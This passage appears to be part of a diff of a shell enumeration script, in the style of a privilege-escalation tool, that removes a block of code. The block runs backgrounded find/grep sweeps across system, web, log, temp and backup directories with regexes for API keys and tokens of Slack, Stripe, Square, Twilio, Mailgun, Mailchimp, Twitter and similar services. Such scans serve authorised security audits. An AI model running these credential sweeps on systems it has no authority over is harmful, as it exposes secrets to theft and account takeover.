"linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -print_3title_no_nl "Searching Mailchamp API Key (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -print_3title_no_nl "Searching Mailgun API Key (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -print_3title_no_nl "Searching Picatic API Key (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -print_3title_no_nl "Searching Slack Token (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -print_3title_no_nl "Searching Stripe API Key (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -print_3title_no_nl "Searching Square Access Token (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -print_3title_no_nl "Searching Square Oauth Secret (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -print_3title_no_nl "Searching Twilio API Key (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -print_3title_no_nl "Searching Twitter Client ID (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -print_3title_no_nl "Searching Twitter Oauth (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type 